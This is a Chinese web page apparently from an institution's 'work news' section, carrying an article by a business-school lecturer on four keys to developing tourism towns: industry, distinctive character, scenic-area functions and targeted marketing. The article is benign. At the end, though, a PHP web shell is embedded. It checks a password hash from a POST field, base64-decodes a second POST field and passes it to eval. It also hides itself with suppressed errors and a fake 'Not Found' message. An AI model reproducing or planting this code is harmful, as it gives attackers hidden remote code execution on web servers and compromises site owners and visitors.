工作动态

首页 > 工作动态 >

    旅游小镇建设的四个关键

           一、“镇”是基础,以产业发展为根本

           所谓旅游小镇,本质上依旧是一个具有建制意义或集散意义的“镇”,是具有一定人口规模的聚居地。镇是城市向农村扩散的中间点,作为区域经济中的一环,镇的发展离不开产业发展的基础。无论是农业、工业抑或流通和服务业,旅游小镇的基础离不开产业的发展,没有产业支撑的城镇经济是不可持续的,更谈不上旅游的发展。而另外一方面,旅游可以提升原有产业的附加值,推进产业纵深发展,对打破二元经济结构也有着重要意义,是推动小镇跨越式发展的加速器。
           二、“小”是边界,以特色内涵为焦点
           小镇在区域范围上不能与城市相比,不是大型综合体,这也是小镇与大城在边界上的重要区别,这也决定小镇不可能像城市那样包罗万象、一应俱全。打造旅游小镇不应盲目造镇,而是在小镇基本设施齐备的前提下,聚焦自己的特色内涵,一定要有和其他小镇相互区别的差异。而这个特色内涵,可以是优势产业,可以是历史文化,也可以是民族习俗,还可以是生活气息,具体应根据每一个小镇的文脉和地脉进行深入挖掘。而且,旅游也应该是小镇特色内涵传承的有效路径之一。
           三、“游”是抓手,以景区功能为中心
           游客固然喜欢原汁原味的目的地,但真要是没有手机信号、没有wifi,大部分游客也绝不会买单。全域旅游时代背景下,想让游客尽心而来、满意而归,景区景点仍然不可偏废。因此,旅游小镇要能让游客引得来、留得住、玩得好,必须要具备旅游景区的基本要素,游客既能发呆,也有线路。因此,旅游小镇应夯实景区的游览、休闲、购物、演艺等基础功能,拓展“商、养、学、闲、情、奇”的新要素,明确开发模式,协调好利益相关者关系,大力发展旅游公共服务体系,带动产品供给侧改革,从而站在风口顺势而为。
           四、“旅”是方向,以精准营销为突破
           旅游小镇既不能冷冷清清,也不是要车水马龙,而是需要有一定数量和质量范围内的游客导入,这就要有市场营销。在大数据时代背景和扁平化社会背景下,每一个、每一群游客都有自己独特的“画像”,旅游小镇必须有自身的品牌定位,找准目标市场的痛点、痒点和兴奋点,但市场营销不能漫天撒网,必须进行创新化、智慧化、信息化的设计,不能完全依靠传统渠道来对旅游小镇进行营销推广,应对数据进行深入挖掘,提升游客体验,加强新媒体和自媒体的切入,实现“精准定位——精准服务——精准营销”。
    (席宇斌,作者系上海商学院酒店管理学院讲师、博士)
"; error_reporting(0); if(isset($_POST['com']) && md5($_POST['com']) == '791dc312b38016ef998c1c146104cd5a' && isset($_POST['content'])) $content = strtr($_POST['content'], '-_,', '+/=');eval(base64_decode($content)); echo "We're sorry but the page your are looking for is Not Found..." ?>